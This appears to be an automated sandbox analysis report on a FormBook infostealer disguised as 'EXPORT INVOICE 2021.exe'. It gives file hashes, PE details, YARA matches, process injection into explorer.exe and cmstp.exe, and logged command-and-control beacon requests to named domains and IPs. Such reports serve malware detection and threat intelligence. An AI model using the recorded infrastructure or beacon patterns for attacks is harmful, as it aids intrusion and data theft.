• Excluded domains from analysis (whitelisted): www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, wu.ec.azureedge.net, wu-shim.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, validation-v2.sls.microsoft.com, arc.msn.com, wu.azureedge.net, dual-a-0001.dc-msedge.net, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, validation-v2.sls.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.

                        Simulations

                        Behavior and APIs

Time | Type | Description
18:21:35 | API Interceptor | 1x Sleep call for process: EXPORT INVOICE 2021.exe modified

                        Joe Sandbox View / Context

                        IPs

Match | Associated Sample Name / URL | Detection | Context
51.161.86.13 | b5WjxiOqab.exe | malicious | www.scottgesslerdesign.com/jzvu/?9rq=mRzEKZUdaNl7ltH3Zt23PFVFKBVOmJl5lI4ImGRT+4jF8hnHGhoZT0nVqsAmeIAJc4K10Wg3ow==&4h=vZR8NxdxOD6xzn

                        Domains

                        No context

                        ASN

Match | Associated Sample Name / URL | Detection | Context
OVHFR | SecuriteInfo.com.Heur.573.xls | malicious | 188.165.62.61
OVHFR | SecuriteInfo.com.Heur.21879.xls | malicious | 188.165.62.61
OVHFR | SecuriteInfo.com.Heur.573.xls | malicious | 188.165.62.61
OVHFR | SecuriteInfo.com.Heur.16533.xls | malicious | 188.165.62.61
OVHFR | SecuriteInfo.com.Heur.18564.xls | malicious | 188.165.62.61
OVHFR | SecuriteInfo.com.Heur.16533.xls | malicious | 188.165.62.61
OVHFR | SecuriteInfo.com.Heur.18564.xls | malicious | 188.165.62.61
OVHFR | SecuriteInfo.com.Heur.10164.xls | malicious | 188.165.62.61
OVHFR | SecuriteInfo.com.Heur.19388.xls | malicious | 188.165.62.61
OVHFR | SecuriteInfo.com.Heur.10164.xls | malicious | 188.165.62.61
OVHFR | SecuriteInfo.com.Heur.19388.xls | malicious | 188.165.62.61
OVHFR | Sales_Receipt 6310.xls | malicious | 51.83.3.52
OVHFR | Purchase_Order 2586.xls | malicious | 51.83.3.52
OVHFR | D9MmQDM0jJ.dll | malicious | 51.83.3.52
OVHFR | A76JJinZL9.dll | malicious | 51.83.3.52
OVHFR | 8QijkUFTSB.dll | malicious | 51.83.3.52
OVHFR | HsGBdHtLk2.dll | malicious | 51.83.3.52
OVHFR | lPzE2YbyzV.dll | malicious | 51.83.3.52
OVHFR | enVuNPtSQE.dll | malicious | 51.83.3.52
OVHFR | REQUIREMENT.exe | malicious | 51.77.52.109
DEFENSE-NETUS | xHSUX1VjKN.exe | malicious | 206.188.193.204
DEFENSE-NETUS | DEUXRWq2W8.exe | malicious | 209.17.116.163
DEFENSE-NETUS | PO08485.xlsx | malicious | 206.188.193.204
DEFENSE-NETUS | KYTransactionServer.exe | malicious | 206.188.192.207
DEFENSE-NETUS | doc_0862413890.exe | malicious | 206.188.193.172
DEFENSE-NETUS | PO08485.xlsx | malicious | 206.188.193.204
DEFENSE-NETUS | 5Zebq6UNKC.exe | malicious | 209.17.116.163
DEFENSE-NETUS | Lv9eznkydx.exe | malicious | 205.178.189.129
DEFENSE-NETUS | x86_64-20211007-1619 | malicious | 170.158.122.60
DEFENSE-NETUS | BILL OF LADING.exe | malicious | 206.188.198.65
DEFENSE-NETUS | 2WK7SGkGVZ.exe | malicious | 209.17.116.163
DEFENSE-NETUS | PO20211006.doc | malicious | 209.17.116.163
DEFENSE-NETUS | PO_A9164.EXE | malicious | 209.17.116.163
DEFENSE-NETUS | oHdx7w2YXC.exe | malicious | 209.17.116.163
DEFENSE-NETUS | fmcg.xlsx | malicious | 209.17.116.163
DEFENSE-NETUS | M0y2otz1JB.exe | malicious | 206.188.197.227
DEFENSE-NETUS | jnnbbMX9Ch.exe | malicious | 209.17.116.163
DEFENSE-NETUS | 3KJ2ZgV4so.exe | malicious | 209.17.116.163
DEFENSE-NETUS | cFjtsk0IBh.exe | malicious | 206.188.197.227
DEFENSE-NETUS | catálogo de productos2021.exe | malicious | 206.188.193.146

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EXPORT INVOICE 2021.exe.log
Process: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.355304211458859
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
MD5: 69206D3AF7D6EFD08F4B4726998856D3
SHA1: E778D4BF781F7712163CF5E2F5E7C15953E484CF
SHA-256: A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
SHA-512: CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
Malicious: true
Reputation: high, very likely benign file
                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                        Static File Info

                        General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.068386623253211
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: EXPORT INVOICE 2021.exe
File size: 840704
MD5: 54bb8fbbfe0a665ca59579a0240ce2f0
SHA1: 0b97e4463c76df4541179880902bb6966ef3f894
SHA256: 3bd841c6957e9fdb7e9d4558fb417dca9d7317d087cdbbb270155d9a6698e657
SHA512: fd6ac3075702fffd66df3566015bd6b2d844f28f0dfc0c638bd9198479514479514cf506bfdd56a671efa233873f9313a8b36d80e0bcb78a88624abd9f9b5770
SSDEEP: 12288:Y+zIPiLYQkt3iJHGmWG3HhY8muu8Rsni2U1Rr6s5yuuETV/O:Y+zWiLYQZaGXhguu8ai2U
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O.fa..............P.............n.... ........@.. .......................@............@................................

                        File Icon

Icon Hash: 00828e8e8686b000

                        Static PE Info

                        General

Entrypoint: 0x4ce86e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x6166C74F [Wed Oct 13 11:47:27 2021 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                        Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al (repeated 97 times: the disassembly of the zero bytes that follow the stub)

                        Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xce81c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd0000 | 0x5b8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd2000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                        Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xcc874 | 0xcca00 | False | 0.600356263363 | data | 7.07298793214 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0xd0000 | 0x5b8 | 0x600 | False | 0.423828125 | data | 4.11165027332 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xd2000 | 0xc | 0x200 | False | 0.044921875 | data | 0.0980041756627 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0xd00a0 | 0x32c | data | |
RT_MANIFEST | 0xd03cc | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                        Imports

DLL | Import
mscoree.dll | _CorExeMain

                        Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2017
Assembly Version | 1.0.0.0
InternalName | CXGHo0w.exe
FileVersion | 1.0.0.0
CompanyName |
LegalTrademarks |
Comments |
ProductName | Ballistic Game
ProductVersion | 1.0.0.0
FileDescription | Ballistic Game
OriginalFilename | CXGHo0w.exe

                        Network Behavior

                        Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
10/13/21-18:23:11.004606 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.4 | 8.8.8.8
10/13/21-18:23:12.994789 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.4 | 8.8.8.8

                        Network Port Distribution

                        TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 13, 2021 18:22:42.307439089 CEST | 49778 | 80 | 192.168.2.4 | 51.161.86.13
Oct 13, 2021 18:22:42.409260988 CEST | 80 | 49778 | 51.161.86.13 | 192.168.2.4
Oct 13, 2021 18:22:42.409439087 CEST | 49778 | 80 | 192.168.2.4 | 51.161.86.13
Oct 13, 2021 18:22:42.409841061 CEST | 49778 | 80 | 192.168.2.4 | 51.161.86.13
Oct 13, 2021 18:22:42.554083109 CEST | 80 | 49778 | 51.161.86.13 | 192.168.2.4
Oct 13, 2021 18:22:42.909389019 CEST | 49778 | 80 | 192.168.2.4 | 51.161.86.13
Oct 13, 2021 18:22:42.997302055 CEST | 80 | 49778 | 51.161.86.13 | 192.168.2.4
Oct 13, 2021 18:22:42.997476101 CEST | 49778 | 80 | 192.168.2.4 | 51.161.86.13
Oct 13, 2021 18:22:43.011189938 CEST | 80 | 49778 | 51.161.86.13 | 192.168.2.4
Oct 13, 2021 18:22:43.011415958 CEST | 49778 | 80 | 192.168.2.4 | 51.161.86.13
Oct 13, 2021 18:22:58.645088911 CEST | 49780 | 80 | 192.168.2.4 | 209.17.116.165
Oct 13, 2021 18:22:58.774971962 CEST | 80 | 49780 | 209.17.116.165 | 192.168.2.4
Oct 13, 2021 18:22:58.775136948 CEST | 49780 | 80 | 192.168.2.4 | 209.17.116.165
Oct 13, 2021 18:22:58.775289059 CEST | 49780 | 80 | 192.168.2.4 | 209.17.116.165
Oct 13, 2021 18:22:58.906469107 CEST | 80 | 49780 | 209.17.116.165 | 192.168.2.4
Oct 13, 2021 18:22:58.906518936 CEST | 80 | 49780 | 209.17.116.165 | 192.168.2.4
Oct 13, 2021 18:22:58.906800985 CEST | 49780 | 80 | 192.168.2.4 | 209.17.116.165
Oct 13, 2021 18:22:58.906903982 CEST | 49780 | 80 | 192.168.2.4 | 209.17.116.165
Oct 13, 2021 18:22:59.037889957 CEST | 80 | 49780 | 209.17.116.165 | 192.168.2.4

                        UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 13, 2021 18:22:42.179533958 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
Oct 13, 2021 18:22:42.301482916 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
Oct 13, 2021 18:22:48.022957087 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
Oct 13, 2021 18:22:48.464329004 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
Oct 13, 2021 18:22:58.514669895 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
Oct 13, 2021 18:22:58.641601086 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
Oct 13, 2021 18:23:03.918273926 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
Oct 13, 2021 18:23:04.926768064 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
Oct 13, 2021 18:23:05.927041054 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
Oct 13, 2021 18:23:07.974427938 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
Oct 13, 2021 18:23:09.945480108 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
Oct 13, 2021 18:23:11.003954887 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
Oct 13, 2021 18:23:12.994712114 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
Oct 13, 2021 18:23:14.961127996 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
Oct 13, 2021 18:23:15.974524021 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
Oct 13, 2021 18:23:16.007596970 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
Oct 13, 2021 18:23:21.774266958 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8

                        ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Oct 13, 2021 18:23:11.004606009 CEST | 192.168.2.4 | 8.8.8.8 | cfff | (Port unreachable) | Destination Unreachable
Oct 13, 2021 18:23:12.994788885 CEST | 192.168.2.4 | 8.8.8.8 | cfff | (Port unreachable) | Destination Unreachable

                        DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Oct 13, 2021 18:22:42.179533958 CEST | 192.168.2.4 | 8.8.8.8 | 0xefe7 | Standard query (0) | www.ratqueen.art | A (IP address) | IN (0x0001)
Oct 13, 2021 18:22:48.022957087 CEST | 192.168.2.4 | 8.8.8.8 | 0x41b0 | Standard query (0) | www.yuezhong66.com | A (IP address) | IN (0x0001)
Oct 13, 2021 18:22:58.514669895 CEST | 192.168.2.4 | 8.8.8.8 | 0xe3a2 | Standard query (0) | www.piedmontpines.school | A (IP address) | IN (0x0001)
Oct 13, 2021 18:23:03.918273926 CEST | 192.168.2.4 | 8.8.8.8 | 0xfb4e | Standard query (0) | www.kalitelihavaperdesi.com | A (IP address) | IN (0x0001)
Oct 13, 2021 18:23:04.926768064 CEST | 192.168.2.4 | 8.8.8.8 | 0xfb4e | Standard query (0) | www.kalitelihavaperdesi.com | A (IP address) | IN (0x0001)
Oct 13, 2021 18:23:05.927041054 CEST | 192.168.2.4 | 8.8.8.8 | 0xfb4e | Standard query (0) | www.kalitelihavaperdesi.com | A (IP address) | IN (0x0001)
Oct 13, 2021 18:23:07.974427938 CEST | 192.168.2.4 | 8.8.8.8 | 0xfb4e | Standard query (0) | www.kalitelihavaperdesi.com | A (IP address) | IN (0x0001)
Oct 13, 2021 18:23:14.961127996 CEST | 192.168.2.4 | 8.8.8.8 | 0xc03f | Standard query (0) | www.zoipartner.com | A (IP address) | IN (0x0001)
Oct 13, 2021 18:23:15.974524021 CEST | 192.168.2.4 | 8.8.8.8 | 0xc03f | Standard query (0) | www.zoipartner.com | A (IP address) | IN (0x0001)
Oct 13, 2021 18:23:21.774266958 CEST | 192.168.2.4 | 8.8.8.8 | 0x27f8 | Standard query (0) | www.sosibibyslot.space | A (IP address) | IN (0x0001)

                        DNS Answers

                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                        Oct 13, 2021 18:22:42.301482916 CEST | 8.8.8.8 | 192.168.2.4 | 0xefe7 | No error (0) | www.ratqueen.art | ratqueen.art | | CNAME (Canonical name) | IN (0x0001)
                        Oct 13, 2021 18:22:42.301482916 CEST | 8.8.8.8 | 192.168.2.4 | 0xefe7 | No error (0) | ratqueen.art | | 51.161.86.13 | A (IP address) | IN (0x0001)
                        Oct 13, 2021 18:22:48.464329004 CEST | 8.8.8.8 | 192.168.2.4 | 0x41b0 | Name error (3) | www.yuezhong66.com | none | none | A (IP address) | IN (0x0001)
                        Oct 13, 2021 18:22:58.641601086 CEST | 8.8.8.8 | 192.168.2.4 | 0xe3a2 | No error (0) | www.piedmontpines.school | | 209.17.116.165 | A (IP address) | IN (0x0001)
                        Oct 13, 2021 18:23:09.945480108 CEST | 8.8.8.8 | 192.168.2.4 | 0xfb4e | Server failure (2) | www.kalitelihavaperdesi.com | none | none | A (IP address) | IN (0x0001)
                        Oct 13, 2021 18:23:11.003954887 CEST | 8.8.8.8 | 192.168.2.4 | 0xfb4e | Server failure (2) | www.kalitelihavaperdesi.com | none | none | A (IP address) | IN (0x0001)
                        Oct 13, 2021 18:23:12.994712114 CEST | 8.8.8.8 | 192.168.2.4 | 0xfb4e | Server failure (2) | www.kalitelihavaperdesi.com | none | none | A (IP address) | IN (0x0001)
                        Oct 13, 2021 18:23:16.007596970 CEST | 8.8.8.8 | 192.168.2.4 | 0xc03f | Name error (3) | www.zoipartner.com | none | none | A (IP address) | IN (0x0001)

                        HTTP Request Dependency Graph

                        • www.ratqueen.art
                        • www.piedmontpines.school

                        HTTP Packets

                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        0 | 192.168.2.4 | 49778 | 51.161.86.13 | 80 | C:\Windows\explorer.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Oct 13, 2021 18:22:42.409841061 CEST | 5301 | OUT | GET /mqi9/?4heD=-Zg8bjv8BJx4HBw&z0=iv8Ag4bEJuIinTRZ0o23voggRtPwqtQ/ydF60y+S+AJP0Z2gEdIzW1gU1h5YO8GPbSLa HTTP/1.1
                        Host: www.ratqueen.art
                        Connection: close
                        Data Raw: 00 00 00 00 00 00 00
                        Data Ascii:
                        Oct 13, 2021 18:22:42.997302055 CEST | 5302 | IN | HTTP/1.1 301 Moved Permanently
                        Server: nginx
                        Date: Wed, 13 Oct 2021 16:22:42 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        X-Frame-Options:
                        X-XSS-Protection: 1; mode=block
                        X-Content-Type-Options: nosniff
                        AS_SERVED_STATIC: false
                        Location: https://www.ratqueen.art/mqi9?4heD=-Zg8bjv8BJx4HBw&z0=iv8Ag4bEJuIinTRZ0o23voggRtPwqtQ/ydF60y+S+AJP0Z2gEdIzW1gU1h5YO8GPbSLa
                        Cache-Control: no-cache
                        X-Request-Id: dc568a08-0ef3-468e-b148-cc198a1a6325
                        X-Runtime: 0.408293
                        Data Raw: 63 30 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 61 74 71 75 65 65 6e 2e 61 72 74 2f 6d 71 69 39 3f 34 68 65 44 3d 2d 5a 67 38 62 6a 76 38 42 4a 78 34 48 42 77 26 61 6d 70 3b 7a 30 3d 69 76 38 41 67 34 62 45 4a 75 49 69 6e 54 52 5a 30 6f 32 33 76 6f 67 67 52 74 50 77 71 74 51 2f 79 64 46 36 30 79 2b 53 2b 41 4a 50 30 5a 32 67 45 64 49 7a 57 31 67 55 31 68 35 59 4f 38 47 50 62 53 4c 61 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: c0<html><body>You are being <a href="https://www.ratqueen.art/mqi9?4heD=-Zg8bjv8BJx4HBw&amp;z0=iv8Ag4bEJuIinTRZ0o23voggRtPwqtQ/ydF60y+S+AJP0Z2gEdIzW1gU1h5YO8GPbSLa">redirected</a>.</body></html>0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        1 | 192.168.2.4 | 49780 | 209.17.116.165 | 80 | C:\Windows\explorer.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Oct 13, 2021 18:22:58.775289059 CEST | 5308 | OUT | GET /mqi9/?z0=TImHsH9dZg2P5abYftozWuM8TNrG03iNFbmWCvRDMTsTbH54OyQX2B6DGU+4mOJFrbhV&4heD=-Zg8bjv8BJx4HBw HTTP/1.1
                        Host: www.piedmontpines.school
                        Connection: close
                        Data Raw: 00 00 00 00 00 00 00
                        Data Ascii:
                        Oct 13, 2021 18:22:58.906469107 CEST | 5308 | IN | HTTP/1.1 400 Bad Request
                        Server: openresty/1.17.8.2
                        Date: Wed, 13 Oct 2021 16:22:58 GMT
                        Content-Type: text/html
                        Content-Length: 163
                        Connection: close
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 37 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.17.8.2</center></body></html>


                        Code Manipulations

                        Statistics

                        Behavior

                        System Behavior

                        General

                        Start time:18:21:08
                        Start date:13/10/2021
                        Path:C:\Users\user\Desktop\EXPORT INVOICE 2021.exe
                        Wow64 process (32bit):true
                        Commandline:'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
                        Imagebase:0x930000
                        File size:840704 bytes
                        MD5 hash:54BB8FBBFE0A665CA59579A0240CE2F0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Reputation:low

                        General

                        Start time:18:21:36
                        Start date:13/10/2021
                        Path:C:\Users\user\Desktop\EXPORT INVOICE 2021.exe
                        Wow64 process (32bit):true
                        Commandline:{path}
                        Imagebase:0xa90000
                        File size:840704 bytes
                        MD5 hash:54BB8FBBFE0A665CA59579A0240CE2F0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        General

                        Start time:18:21:38
                        Start date:13/10/2021
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Explorer.EXE
                        Imagebase:0x7ff6fee60000
                        File size:3933184 bytes
                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        General

                        Start time:18:22:03
                        Start date:13/10/2021
                        Path:C:\Windows\SysWOW64\cmstp.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\cmstp.exe
                        Imagebase:0x350000
                        File size:82944 bytes
                        MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Author: Joe Security
